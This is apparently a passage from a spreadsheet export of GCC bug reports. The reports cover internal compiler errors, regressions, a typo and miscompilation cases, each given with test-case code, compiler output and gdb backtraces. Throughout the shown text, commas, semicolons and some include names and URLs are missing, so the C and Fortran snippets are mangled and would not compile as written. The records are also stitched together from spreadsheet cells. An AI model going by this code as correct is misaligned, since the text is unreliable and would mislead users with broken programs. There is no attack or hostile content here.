----------------------- test.f90 --------------------
PROGRAM TEST
! using the vec3d module as a simple test
  use module_vec3d only: cross_product
  implicit none
  ! parameters for precision control
  integer parameter :: SP = selected_real_kind(6)
  integer parameter :: DP = selected_real_kind(12)
  ! locals
  real(SP) :: a(3)
  real(DP) :: b(3) c(3)
  integer :: i
  a = (/ 1.0 2.0 3.0 /)
  b = (/ 1.0 -1.0 2.0 /)
  do i = 1 10000000
     ! do the test many times so we see it high up in the profiler
     c = cross_product(a b)
  end do
  ! print the answer
  print * 'c = ' c(1) c(2) c(3)
END PROGRAM TEST
--------------------------------------------------
I get the following error:
&gt; gfortran -v -save-temps -c test.f90
Reading specs from /home/mamod/amos/gcc-3.5/lib/gcc/i686-pc-linux-gnu/4.0.0/specs
Configured with: ../gcc/configure --prefix=/home/mamod/amos/gcc-3.5
--enable-threads --enable-languages=f95 --with-dwarf2
--with-gmp=/home/aeroapp/linux/gmp-4.1.2 --with-mpfr=/home/mamod/amos
Thread model: posix
gcc version 4.0.0 20040922 (experimental)
 /home/mamod/amos/gcc-3.5/libexec/gcc/i686-pc-linux-gnu/4.0.0/f951 test.f90
-quiet -dumpbase test.f90 -mtune=pentiumpro -auxbase test -version -o test.s
GNU F95 version 4.0.0 20040922 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 4.0.0 20040922 (experimental).
GGC heuristics: --param ggc-min-expand=30 --param ggc-min-heapsize=4096
test.f90: In function 'MAIN__':
test.f90:24: internal compiler error: in gfc_trans_arrayfunc_assign at
fortran/trans-expr.c:2011
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
When cross_product3_R4_R8 is exported and used directly there is no problem the
code compiles and runs correctly.</t>
  </si>
  <si>
    <t>matthew.amos</t>
  </si>
  <si>
    <t>GCC-27968</t>
  </si>
  <si>
    <t>gcc emits (undefined) ffreep opcode which is not understood by Solaris' /usr/ccs/bin/as when tuning for Athlon or Opteron CPUs</t>
  </si>
  <si>
    <t>GCC emits the (undefined) instruction ffreep when TARGET_USE_FFREEP is set (which happens when -mtune opteron or -mtune athlon is passed on the command line.
As of the latest available build Solaris' /usr/ccs/bin/as doesn't understand this opcode and barfs.
The use of ffreep seems to have been introduced and discussed in this thread: http://gcc.gnu.org/ml/gcc-patches/2002-11/msg01386.html.</t>
  </si>
  <si>
    <t>digitale</t>
  </si>
  <si>
    <t>GCC-48495</t>
  </si>
  <si>
    <t>ICE in in reload_cse_simplify_operands</t>
  </si>
  <si>
    <t>Created attachment 23911
reduced testcase
Noticed the following building cpu2000 benchmark 176.gcc.
$ ~/install/gcc/trunk/bin/gcc -c -O3 -mcpu=power7 recog.c
recog.c: In function â€˜constrain_operandsâ€™:
recog.c:149:1: error: insn does not satisfy its constraints:
(insn 958 1120 1122 13 (set (mem:V2DI (plus:DI (reg:DI 7 7)
                (reg:DI 5 5 [orig:336 ivtmp.91 ] [336])) [2 MEM[symbol: constraints index: ivtmp.91_200 offset: 0B]+0 S16 A128])
        (reg:V2DI 8 8 [639])) recog.c:67 754 {*vsx_movv2di}
     (nil))
recog.c:149:1: internal compiler error: in reload_cse_simplify_operands at postreload.c:403
Please submit a full bug report
with preprocessed source if appropriate.</t>
  </si>
  <si>
    <t>GCC-14810</t>
  </si>
  <si>
    <t>[3.4/4.0 regression] tree check failures with invalid code involving templates</t>
  </si>
  <si>
    <t>Mark your patches
http://gcc.gnu.org/ml/gcc-cvs/2004-03/msg01269.html (3.4 version)
http://gcc.gnu.org/ml/gcc-cvs/2004-03/msg01270.html (mainline version)
cause several tree check failures with invalid code involving templates like
testsuite/g++.dg/parse/error1.C    (PR 10432)
===================================================
struct INCOMPLETE
template  struct X {
    static INCOMPLETE value
}
template  INCOMPLETE X::value = 0 // { dg-error  }
===================================================
testsuite/g++.dg/template/error1.C (PR 10219)
===================================================
template  void make_pair(T x)
void foo(){
  struct fps_chan_ID fps // { dg-error incomplete  }
  make_pair(fps) // { dg-error no matching function  }
}
===================================================
Could you please have a look?</t>
  </si>
  <si>
    <t>GCC-67889</t>
  </si>
  <si>
    <t>ICE on valid code at -O1 and above on x86_64-linux-gnu in VN_INFO at tree-ssa-sccvn.c:384</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk at -O1 and above on x86_64-linux-gnu in both 32-bit and 64-bit modes.
It is a regression from 5.2.x.
$ gcc-trunk -v
Using built-in specs.
COLLECT_GCC=gcc-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20151007 (experimental) [trunk revision 228566] (GCC) 
$ 
$ gcc-trunk -O0 -c small.c
$ gcc-5.2 -O1 -c small.c
$ 
$ gcc-trunk -O1 -c small.c
small.c: In function â€˜fn1â€™:
small.c:11:1: internal compiler error: in VN_INFO at tree-ssa-sccvn.c:384
 }
 ^
0xc5710b VN_INFO(tree_node*)
	../../gcc-trunk/gcc/tree-ssa-sccvn.c:384
0xc57854 vn_valueize
	../../gcc-trunk/gcc/tree-ssa-sccvn.h:236
0xe29afd do_valueize(tree_node* (*)(tree_node*) tree_node*)
	../../gcc-trunk/gcc/gimple-match-head.c:802
0xe29afd gimple_simplify_CONVERT_EXPR
	/tmp/objdir/gcc/gimple-match.c:8085
0xe05b50 gimple_simplify
	/tmp/objdir/gcc/gimple-match.c:12600
0xe08115 gimple_resimplify1
	../../gcc-trunk/gcc/gimple-match-head.c:123
0xe2a8ee gimple_simplify_CONVERT_EXPR
	/tmp/objdir/gcc/gimple-match.c:8306
0xe05b50 gimple_simplify
	/tmp/objdir/gcc/gimple-match.c:12600
0xe08115 gimple_resimplify1
	../../gcc-trunk/gcc/gimple-match-head.c:123
0xe2a66f gimple_simplify_CONVERT_EXPR
	/tmp/objdir/gcc/gimple-match.c:8355
0xe05b50 gimple_simplify
	/tmp/objdir/gcc/gimple-match.c:12600
0xe08115 gimple_resimplify1
	../../gcc-trunk/gcc/gimple-match-head.c:123
0xe065b7 gimple_simplify_VIEW_CONVERT_EXPR
	/tmp/objdir/gcc/gimple-match.c:8570
0xe065b7 gimple_simplify
	/tmp/objdir/gcc/gimple-match.c:12602
0xe07f71 gimple_simplify(tree_code tree_node* tree_node* gimple** tree_node* (*)(tree_node*))
	../../gcc-trunk/gcc/gimple-match-head.c:400
0xc5f073 visit_reference_op_load
	../../gcc-trunk/gcc/tree-ssa-sccvn.c:3049
0xc5f073 visit_use
	../../gcc-trunk/gcc/tree-ssa-sccvn.c:3416
0xc617d4 process_scc
	../../gcc-trunk/gcc/tree-ssa-sccvn.c:3636
0xc617d4 extract_and_process_scc_for_name
	../../gcc-trunk/gcc/tree-ssa-sccvn.c:3723
0xc617d4 DFS
	../../gcc-trunk/gcc/tree-ssa-sccvn.c:3775
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
----------------------------
unsigned int a *b
unsigned short c
int d
void 
fn1 ()
{
  b = 
  *b = c = a 
  *b = d
}</t>
  </si>
  <si>
    <t>GCC-8752</t>
  </si>
  <si>
    <t>error compiling plural.c in gcc/intl</t>
  </si>
  <si>
    <t>cc -c -DIN_GCC -DLOCALEDIR=\/usr/local/share/locale\ -DLOCALE_ALIAS_PATH=\/usr/local/share/locale\ -DLIBDIR=\/usr/
local/lib\ -DHAVE_CONFIG_H -I.. -I. -I/software/gcc-3.2.1/gcc/intl -I/software/gcc-3.2.1/gcc -I/software/gcc-3.2.1/gcc
/config -I/software/gcc-3.2.1/gcc/../include  -g    /software/gcc-3.2.1/gcc/intl/plural.c -o plural.o
plural.y line 264.1: 1506-343 (S) Redeclaration of __gettextlex differs from previous declaration on line 73 of plu
ral.y.
plural.y line 264.1: 1506-381 (I) The type const unsigned char** of parameter 2 in the prototype declaration is no
t compatible with the corresponding parameter type unsigned char** in the nonprototype declaration.
Release:
gcc (GCC) 3.2.1
Environment:
AIX 5100-03</t>
  </si>
  <si>
    <t>rolf-alois.walter</t>
  </si>
  <si>
    <t>GCC-83</t>
  </si>
  <si>
    <t>ANSI C does not support the `L' length modifier</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Sun 05 Mar 2000 19:27:19 -0800
 Original-Message-ID: 
 Hi
 the compiler warns (with the --pedantic flag on) about the `L' modifier
 in the code below. Since the modifier is specified by ANSI C99 (see
 7.19.6.1 p7) the warning should now be disabled.
 #include 
 int main ()
 {
     printf (%Lg\n 0.0L)
 }
 $ g++ -c -Wall --pedantic test.cpp
 test.cpp: In function `int main()':
 test.cpp:7: warning: ANSI C does not support the `L' length modifier
 Thanks
 Martin
 --== Sent via Deja.com http://www.deja.com/ ==--
 Share what you know. Learn what you don't.
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-58398</t>
  </si>
  <si>
    <t>[4.9 Regression] gcc.dg/attr-ifunc-4.c runfail regression after r202111</t>
  </si>
  <si>
    <t>Somewhere between r202108 [1] and r202113 [2] a testsuite regression was introduced:
FAIL: gcc.dg/attr-ifunc-4.c execution test
r202111 is the most probable change that introduced this regression:
Author: hubicka
Date: Fri Aug 30 15:41:26 2013
New Revision: 202111
URL: http://gcc.gnu.org/viewcvs?rev=202111&amp;root=gcc&amp;view=rev
Log:
	* cgraph.c (cgraph_function_body_availability): Handle weakref
	correctly.
	* passes.def: Remove pass_fixup_cfg.
	* ipa-inline.c (ipa_inline): When not optimizing do not inline
	track when we need to remove functions.
	(gate_ipa_inline): Execute inlining always add comment why.
	(pass_data_ipa_inline): Remove TODO_remove_functions.
	* ipa-inline-analysis.c (inline_generate_summary): When not optimizing
	do not produce summaries.
	* symtab.c (change_decl_assembler_name): Handle renaming of weakrefs.
	(symtab_nonoverwritable_alias): Assert we are not called on weakref.
	* varpool.c (cgraph_variable_initializer_availability): Fix weakrefs
	constant pool and vtable.
[1] http://gcc.gnu.org/ml/gcc-testresults/2013-08/msg02931.html
[2] http://gcc.gnu.org/ml/gcc-testresults/2013-08/msg02937.html</t>
  </si>
  <si>
    <t>GCC-32641</t>
  </si>
  <si>
    <t>C99 fpclassify isinf isfinite isnormal may raise FP exceptions</t>
  </si>
  <si>
    <t>On solaris 10 the C99 macros fpclassify isinf isfinite and isnormal are created for GCC by fixincludes.  The resulting macros do not properly guard against raising FP exceptions in various cases.  Here are the current macro definitions as created by fixincludes into iso/math_c99.h:
#undef  fpclassify
#define fpclassify(x) \
  __extension__ ({ __typeof(x) __x_fp = (x) \
                   isnan(__x_fp) \
                     ? FP_NAN \
                     : isinf(__x_fp) \
                       ? FP_INFINITE \
                       : isnormal(__x_fp) \
                         ? FP_NORMAL \
                         : __x_fp == 0.0 \
                           ? FP_ZERO \
                           : FP_SUBNORMAL })
#undef  isfinite
#define isfinite(x) \
  __extension__ ({ __typeof (x) __x_f = (x) \
                   __builtin_expect(!isnan(__x_f - __x_f) 1) })
#undef  isinf
#define isinf(x) \
  __extension__ ({ __typeof (x) __x_i = (x) \
                   __builtin_expect(!isnan(__x_i)  })
#undef  isnan
#define isnan(x)        __builtin_isnan(x)
#undef  isnormal
#define isnormal(x) \
  __extension__ ({ __typeof(x) __x_n = (x) \
                   if (__x_n &lt; 0.0) __x_n = -__x_n \
                   __builtin_expect(isfinite(__x_n) \
                                    &amp;&amp; (sizeof(__x_n) == sizeof(float) \
                                          ? __x_n &gt;= __FLT_MIN__ \
                                          : sizeof(__x_n) == sizeof(long double) \
                                            ? __x_n &gt;= __LDBL_MIN__ \
                                            : __x_n &gt;= __DBL_MIN__) 1) })
Problems I've noted so far include:
1.  The isfinite macro uses a subtraction.  If supplied with inf the inf-inf expr results in a NaN which raises an exception.
2.  The isfinite macro is used in fpclassify and isinf which can therefore also raise exceptions.
3.  The isnormal macro uses ordered comparisons which raise exceptions when supplied with NaN.
This occurs in 4.1.x 4.2.x and mainline.</t>
  </si>
  <si>
    <t>GCC-24784</t>
  </si>
  <si>
    <t>Warning about unused routine argument should not read unused variable</t>
  </si>
  <si>
    <t>The Fortran code
$ cat unused.f90 
subroutine a(x)
  implicit none
  real x
end subroutine a
gives the warning
$ ~/gcc/bin/gfortran -c unused.f90 -Wall
unused.f90: In function â€˜aâ€™:
unused.f90:1: warning: unused variable â€˜xâ€™
when compiled with
$ ~/gcc/bin/gfortran --version
GNU Fortran 95 (GCC) 4.1.0 20051030 (experimental)
I find the text of this warning confusing because the unused entity is an argument not a variable.  It is always possible to remove unused local variables from a routine's body but changing a routine's list of arguments is sometimes not feasible.  Warnings about unused variables and unused arguments should therefore be separate.  The warning should instead read unused argument 'x'.</t>
  </si>
  <si>
    <t>GCC-38084</t>
  </si>
  <si>
    <t>[graphite] ICE : in build_graphite_scops at graphite.c:1829</t>
  </si>
  <si>
    <t>gcc -O3 -fgraphite-identity test_graphite_scop.c
test_graphite_scop.c: In function 'test_in':
test_graphite_scop.c:12: internal compiler error: in build_graphite_scops at graphite.c:1829
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Same test case fails for -floop-block switch as well.....
gcc -O3 -floop-block test_graphite_scop.c
test_graphite_scop.c: In function 'test_in':
test_graphite_scop.c:12: internal compiler error: in build_graphite_scops at graphite.c:1829
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Reduced test case is attached for the same...
-Mitul Thakkar.</t>
  </si>
  <si>
    <t>GCC-9052</t>
  </si>
  <si>
    <t>in C code if statement fails to execute if optimized</t>
  </si>
  <si>
    <t xml:space="preserve"> for (n=1n&lt;MAXITERn++)
     {r[n]=r[n-1]*r[n-1]-i[n-1]*i[n-1]+cr
      i[n]=2*r[n-1]*i[n-1]+ci
      if (fabs(r[n])&gt;256 || fabs(i[n])&gt;256 || (!(n&amp;1) &amp;&amp; r[n/2]==r[n]&amp;&amp; i[n/2]==i[n]))
         break
      printf(%5d %7.3f %7.3f\nnr[n]i[n])
      }
the if statement never triggers and the loop never breaks.
Release:
3.2
Environment:
Reading specs from /usr/lib/gcc-lib/i386-pc-linux-gnu/3.2/specs
Configured with: /usr/src/gcc-3.2/configure --host=i386-pc-linux-gnu --prefix=/usr --enable-threads=posix --enable-languages=cc++objc
Thread model: posix
gcc version 3.2
Processor: AMD Athlon 1200 MHz.
How-To-Repeat:
Compile this with gcc -O2 -o mandeljulia main.c -lm --save-temps or -O1 and run it and it incorrectly outputs 255. If compiled with -O0 it correctly outputs 12. Move printf between i[n] and if and compile with -O2 and it outputs 12.</t>
  </si>
  <si>
    <t>phma</t>
  </si>
  <si>
    <t>GCC-25756</t>
  </si>
  <si>
    <t>ICE on valid code with labels</t>
  </si>
  <si>
    <t>attached label_3.f90 label_4.f90 and label_5.f90 ICE with
gcc version 4.1.0 20060111 (prerelease)
As this worked with g77 please make pr19292 depend on this.
Backtraces are provided for the sake of completeness.
$ gfortran-4.1-HEAD -v  -c -o /tmp/foo.o label_3.f90
 In file label_3.f90:4
1 ! { dg-warning Ignoring statement label in empty statement }
                                                               1
Warning: Ignoring statement label in empty statement at (1)
label_3.f90:5: internal compiler error: Segmentation fault
backtrace label_3.f90:
Program received signal SIGSEGV Segmentation fault.
free_expr0 (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:141
141	  switch (e-&gt;expr_type)
(gdb) bt
#0  free_expr0 (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:141
#1  0x0805f161 in gfc_free_expr (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:230
#2  0x08090663 in gfc_free_namespace (ns=0x8564d30) at ../../../src/gcc-4.1/gcc/fortran/symbol.c:1504
#3  0x08090728 in gfc_symbol_done_2 () at ../../../src/gcc-4.1/gcc/fortran/symbol.c:2393
#4  0x080783f8 in gfc_done_2 () at ../../../src/gcc-4.1/gcc/fortran/misc.c:293
#5  0x0807f1fe in gfc_parse_file () at ../../../src/gcc-4.1/gcc/fortran/parse.c:2685
#6  0x08098593 in gfc_be_parse_file (set_yydebug=0) at ../../../src/gcc-4.1/gcc/fortran/f95-lang.c:286
#7  0x082cc358 in toplev_main (argc=11 argv=0xbfb72194) at ../../../src/gcc-4.1/gcc/toplev.c:990
#8  0x080ba0f2 in main (argc=8191 argv=0x29) at ../../../src/gcc-4.1/gcc/main.c:35
======================================================================
$ gfortran-4.1-HEAD -v  -c -o /tmp/foo.o label_4.f90
 In file label_4.f90:4
1 ! { dg-warning Ignoring statement label in empty statement }
                                                               1
Warning: Ignoring statement label in empty statement at (1)
label_4.f90:5: internal compiler error: Segmentation fault
backtrace label_4.f90:
Program received signal SIGSEGV Segmentation fault.
free_expr0 (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:141
141	  switch (e-&gt;expr_type)
(gdb) bt
#0  free_expr0 (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:141
#1  0x0805f161 in gfc_free_expr (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:230
#2  0x08090663 in gfc_free_namespace (ns=0x8564d30) at ../../../src/gcc-4.1/gcc/fortran/symbol.c:1504
#3  0x08090728 in gfc_symbol_done_2 () at ../../../src/gcc-4.1/gcc/fortran/symbol.c:2393
#4  0x080783f8 in gfc_done_2 () at ../../../src/gcc-4.1/gcc/fortran/misc.c:293
#5  0x0807f1fe in gfc_parse_file () at ../../../src/gcc-4.1/gcc/fortran/parse.c:2685
#6  0x08098593 in gfc_be_parse_file (set_yydebug=0) at ../../../src/gcc-4.1/gcc/fortran/f95-lang.c:286
#7  0x082cc358 in toplev_main (argc=11 argv=0xbfd7a324) at ../../../src/gcc-4.1/gcc/toplev.c:990
#8  0x080ba0f2 in main (argc=8191 argv=0x29) at ../../../src/gcc-4.1/gcc/main.c:35
======================================================================
$ gfortran-4.1-HEAD -v  -c -o /tmp/foo.o label_5.f90
 In file label_5.f90:4
1 ! { dg-warning Ignoring statement label in empty statement }
                                                               1
Warning: Ignoring statement label in empty statement at (1)
 In file label_5.f90:5
1 ! { dg-warning Ignoring statement label in empty statement }
                                                               1
Warning: Ignoring statement label in empty statement at (1)
label_5.f90:6: internal compiler error: Segmentation fault
backtrace label_5.f90:
Program received signal SIGSEGV Segmentation fault.
free_expr0 (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:141
141	  switch (e-&gt;expr_type)
(gdb) bt
#0  free_expr0 (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:141
#1  0x0805f161 in gfc_free_expr (e=0x12) at ../../../src/gcc-4.1/gcc/fortran/expr.c:230
#2  0x08090663 in gfc_free_namespace (ns=0x8564d90) at ../../../src/gcc-4.1/gcc/fortran/symbol.c:1504
#3  0x08090728 in gfc_symbol_done_2 () at ../../../src/gcc-4.1/gcc/fortran/symbol.c:2393
#4  0x080783f8 in gfc_done_2 () at ../../../src/gcc-4.1/gcc/fortran/misc.c:293
#5  0x0807f1fe in gfc_parse_file () at ../../../src/gcc-4.1/gcc/fortran/parse.c:2685
#6  0x08098593 in gfc_be_parse_file (set_yydebug=0) at ../../../src/gcc-4.1/gcc/fortran/f95-lang.c:286
#7  0x082cc358 in toplev_main (argc=11 argv=0xbf8d1e34) at ../../../src/gcc-4.1/gcc/toplev.c:990
#8  0x080ba0f2 in main (argc=8191 argv=0x29) at ../../../src/gcc-4.1/gcc/main.c:35</t>
  </si>
  <si>
    <t>GCC-78039</t>
  </si>
  <si>
    <t>[6 Regression] fails to compile glibc tests with invalid flexible array member</t>
  </si>
  <si>
    <t>Created attachment 39841
preprocessed source
gcc-6-branch 20161018 fails to build the glibc-2.24 tests:
$ g++ -std=gnu++11 -c -O2 math/test-math-isinff.ii
In file included from ../include/gconv.h:1:0
                 from ../sysdeps/unix/sysv/linux/_G_config.h:32
                 from ../libio/libio.h:31
                 from ../include/libio.h:4
                 from ../libio/stdio.h:74
                 from ../include/stdio.h:5
                 from test-math-isinff.cc:22:
../iconv/gconv.h:142:50: error: flexible array member '__gconv_info::__data' not at end of 'struct _IO_codecvt'
In file included from ../include/libio.h:4:0
                 from ../libio/stdio.h:74
                 from ../include/stdio.h:5
                 from test-math-isinff.cc:22:
../libio/libio.h:211:14: note: next member '_G_iconv_t _IO_codecvt::__cd_out' declared here
../libio/libio.h:187:8: note: in the definition of 'struct _IO_codecvt'
In file included from ../include/gconv.h:1:0
                 from ../sysdeps/unix/sysv/linux/_G_config.h:32
                 from ../libio/libio.h:31
                 from ../include/libio.h:4
                 from ../libio/stdio.h:74
                 from ../include/stdio.h:5
                 from test-math-isinff.cc:22:
../iconv/gconv.h:142:50: error: flexible array member '__gconv_info::__data' not at end of 'struct _IO_wide_data'
In file included from ../include/libio.h:4:0
                 from ../libio/stdio.h:74
                 from ../include/stdio.h:5
                 from test-math-isinff.cc:22:
../libio/libio.h:211:14: note: next member '_G_iconv_t _IO_codecvt::__cd_out' declared here
../libio/libio.h:215:8: note: in the definition of 'struct _IO_wide_data'</t>
  </si>
  <si>
    <t>GCC-59929</t>
  </si>
  <si>
    <t>[4.8/4.9 regression] -mno-accumulate-outgoing-args doesn't work with x32</t>
  </si>
  <si>
    <t>[hjl@gnu-mic-2 tmp]$ cat /tmp/testf.c
void
test (float x1 float x2 float x3 float x4 float x5 float x6
      float x7 float x8 float x9 float x10 float x11 float x12
      float x13 float x14 float x15 float x16)
{
  if (x1 != 91)
    __builtin_abort ()
  if (x15 != 105)
    __builtin_abort ()
}
float x1 x2 x3 x4 x5 x6 x7 x8 x9 x10 x11 x12 x13
      x14 x15 x16
int
main ()
{
  x1 = 91
  x2 = 92
  x3 = 93
  x4 = 94
  x5 = 95
  x6 = 96
  x7 = 97
  x8 = 98
  x9 = 99
  x10 = 100
  x11 = 101
  x12 = 102
  x13 = 103
  x14 = 104
  x15 = 105
  x16 = 106
  test (x1 x2 x3 x4 x5 x6 x7 x8 x9 x10 x11 x12 x13
	x14 x15 x16)
  return 0
}
[hjl@gnu-mic-2 tmp]$ gcc /tmp/testf.c -mno-accumulate-outgoing-args -mx32 -g
[hjl@gnu-mic-2 tmp]$ gdb a.out 
GNU gdb (GDB) 7.6.50.20131208-cvs
Copyright (C) 2013 Free Software Foundation Inc.
License GPLv3+: GNU GPL version 3 or later 
This is free software: you are free to change and redistribute it.
There is NO WARRANTY to the extent permitted by law.  Type show copying
and show warranty for details.
This GDB was configured as x86_64-unknown-linux-gnu.
Type show configuration for configuration details.
For bug reporting instructions please see:
.
Find the GDB manual and other documentation resources online at:
.
For help type help.
Type apropos word to search for commands related to word...
Reading symbols from a.out...done.
(gdb) r
Starting program: /tmp/a.out 
Program received signal SIGABRT Aborted.
0xf7a55192 in raise () from /libx32/libc.so.6
(gdb) f 1
#1  0xf7a56776 in abort () from /libx32/libc.so.6
(gdb) f 2
#2  0x00400449 in test (x1=91 x2=92 x3=93 x4=94 x5=95 x6=96 x7=97 
    x8=98 x9=99 x10=100 x11=101 x12=102 x13=103 x14=104 x15=106 
    x16=1.40129846e-45) at /tmp/testf.c:9
9	    __builtin_abort ()
(gdb)</t>
  </si>
  <si>
    <t>GCC-52284</t>
  </si>
  <si>
    <t>translatable string typo: compatable</t>
  </si>
  <si>
    <t>gcc/config/rx/rx.opt:90:
... The default is to generate GAS compatable syntax.
-&gt;
... compatible ...</t>
  </si>
  <si>
    <t>GCC-35284</t>
  </si>
  <si>
    <t>Branch to 0x0 from Ada run-time</t>
  </si>
  <si>
    <t>As reported in http://gcc.gnu.org/ml/gcc-testresults/2008-02/msg00747.html I am seeing a few hundred failures for ACATS on i386-rtems4.9.  The failure set appears to be about the same for 5.3.4 4.3-branch and SVN trunk.  I am trying to debug
this on the SVN trunk.  I have finally captured the failure and hope someone can 
help me run down what is broken. This report focuses on a99006a.
I am running on qemu and by turning on its debugging I have  managed find that the Ada run-time does an indirect jump to 0x0.  I will attach a symbol table along with the compressed qemu.log.
The last few instructions before the jump to 0x0 involve a call to
system__soft_links__set_jmpbuf_address_soft so I set a breakpoint there.
On the 8th time it hits it the address passed in is 0x0 and the backtrace
is this:
 Breakpoint 1 system.soft_links.set_jmpbuf_address_soft (addr=(system.address) 0x0) at s-soflin.adb:270
270        procedure Set_Jmpbuf_Address_Soft (Addr : Address) is
(gdb) bt
#0  system.soft_links.set_jmpbuf_address_soft (addr=(system.address) 0x0) at s-soflin.adb:270
#1  0x00117c52 in system.file_io.chain_file (file=0x14ffa0) at s-fileio.adb:166
#2  0x001119d8 in  () at a-textio.adb:2272
#3  0x001002ea in adainit () at ../../../../../../../../../423/rtems/c/src/lib/libbsp/i386/pc386/start/start.S:192
#4  0x0010036d in gnat_main () at ../../../../../../../../../423/rtems/c/src/lib/libbsp/i386/pc386/start/start.S:192
#5  0x0010039c in start_gnat_main ()
    at ../../../../../../../../../423/rtems/c/src/lib/libbsp/i386/pc386/start/start.S:192
#6  0x00137107 in _Thread_Handler ()
    at ../../../../../../../423/rtems/c/src/../../cpukit/score/src/threadhandler.c:151
It runs and does some more calls to that same routine but eventually we 
end up doing the indirect call to 0x0 from the middle of 
system__tasking__stages__task_wrapper
I have checked and memory is initialized to zero on this BSP in case this was
an issue and none of the tasks in this test are blowing their stacks.
Advice definitely appreciated on this one.</t>
  </si>
  <si>
    <t>GCC-27882</t>
  </si>
  <si>
    <t>[4.1 regression] segfault in ipa-inline.c if (e-&gt;callee-&gt;local.disregard_inline_limits</t>
  </si>
  <si>
    <t>I get a segfault with 20060530 when building xstow that I didn't get with
20060508.  The segfault doesn't show up when I run g++ on the preprocessed
file but pinskia pointed out that I should use --param ggc-min-expand=0
--param ggc-min-heapsize=0 and indeed when I add --param ggc-min-expand=0
I see it - but also with 20060508.
It turns out that this segfault was introduced sometime between 20060325
and 20060419.  (And in fact compiling xstow with 20060419 also segfaults
just not 20060508.)
(sid)492:tbm@reyes: ~] /usr/lib/gcc-snapshot/bin/g++ -c --param ggc-min-expand=0 -O2 segfault.c
segfault.c:3617: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
zsh: exit 1     /usr/lib/gcc-snapshot/bin/g++ -c --param ggc-min-expand=0 -O2 segfault.c
(sid)493:tbm@reyes: ~] /usr/lib/gcc-snapshot/bin/g++ -c --param ggc-min-expand=0 segfault.c
(sid)494:tbm@reyes: ~]
Program received signal SIGSEGV Segmentation fault.
cgraph_decide_inlining_incrementally (node=0x8d619d00 early=1 '\001')
    at /home/tbm/scratch/gcc/gcc/ipa-inline.c:1055
1055        if (e-&gt;callee-&gt;local.disregard_inline_limits
(gdb) where
#0  cgraph_decide_inlining_incrementally (node=0x8d619d00 early=1 '\001')
    at /home/tbm/scratch/gcc/gcc/ipa-inline.c:1055
#1  0x085835bd in cgraph_early_inlining () at /home/tbm/scratch/gcc/gcc/ipa-inline.c:1163
#2  0x0852c1e6 in execute_one_pass (pass=0x874b660) at /home/tbm/scratch/gcc/gcc/passes.c:864
#3  0x0852c417 in execute_ipa_pass_list (pass=0x874b660) at /home/tbm/scratch/gcc/gcc/passes.c:925
#4  0x0857f1f5 in cgraph_optimize () at /home/tbm/scratch/gcc/gcc/cgraphunit.c:1378
#5  0x080d66ca in cp_finish_file () at /home/tbm/scratch/gcc/gcc/cp/decl2.c:3112
#6  0x0819efff in c_common_parse_file (set_yydebug=0) at /home/tbm/scratch/gcc/gcc/c-opts.c:1165
#7  0x084f6f7d in toplev_main (argc=1 argv=0xaff02de4) at /home/tbm/scratch/gcc/gcc/toplev.c:999
#8  0xa7dc1eb0 in __libc_start_main () from /lib/tls/libc.so.6
#9  0x08049c11 in _start () at ../sysdeps/i386/elf/start.S:119
(gdb)</t>
  </si>
  <si>
    <t>GCC-2984</t>
  </si>
  <si>
    <t>File name information is incorrect in debug output</t>
  </si>
  <si>
    <t>I've entered this bug under debug though I believe the
bug lies in c-lex.c's function cb_file_change and its
interaction with the global variables and functions of
toplev.c.
Debug output often has the wrong file name but correct line
number associated with a line of code.  
Here is an example from Benjamin Kosnik:
#include 
#include 
int test01()
{ 
  std::ios_base::sync_with_stdio()
  std::printf(1) // stdout has 1 in in now
  std::cout &lt;&lt; 2
  std::putc('3' stdout) // std::stdout doesn't work here
  std::cout &lt;&lt; '4'
  return 0
} 
int main()
{
  test01()
}
Compiling this with -g and the current compiler and then running
gdb on the resultant execuatable gives:
  std::cout &lt;&lt; 2  // step in on this line
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /mnt/hd/bliss/src.gcc/libstdc++-v3/testsuite/a.out
std::basic_ostream &gt;&amp; std::operator
+&gt;(std::basic_ostream &gt;&amp; char const*) (
    __out=@0x80ebde0 __s=0x80c8dc2 2) at include/bits/std_ostream.h:635
Line number 635 out of range include/bits/std_ostream.h has 283 lines.
Release:
3.0 prerelease 3.1
Environment:
Linux x86</t>
  </si>
  <si>
    <t>GCC-68696</t>
  </si>
  <si>
    <t>[6 Regression] FAIL: gcc.target/aarch64/vbslq_u64_1.c scan-assembler-times bif\\tv 1</t>
  </si>
  <si>
    <t>After r231178 the above testcase started failing.
For the code:
typedef __Uint32x4_t uint32x4_t
uint32x4_t
vbslq_dummy_u32 (uint32x4_t a uint32x4_t b uint32x4_t mask)
{
  return (mask 
}
at -O3 we started generating:
vbslq_dummy_u32:
	eor	v0.16b v0.16b v1.16b
	and	v0.16b v0.16b v2.16b
	eor	v0.16b v0.16b v1.16b
	ret
instead of:
vbslq_dummy_u32:
	bif	v0.16b v1.16b v2.16b
	ret
This is because of the slightly different tree sequences and hence RTL insns that get generated. So combine now tries and fails to match:
(set (reg:V4SI 79)
    (xor:V4SI (and:V4SI (xor:V4SI (reg:V4SI 32 v0 [ a ])
                (reg/v:V4SI 77 [ b ]))
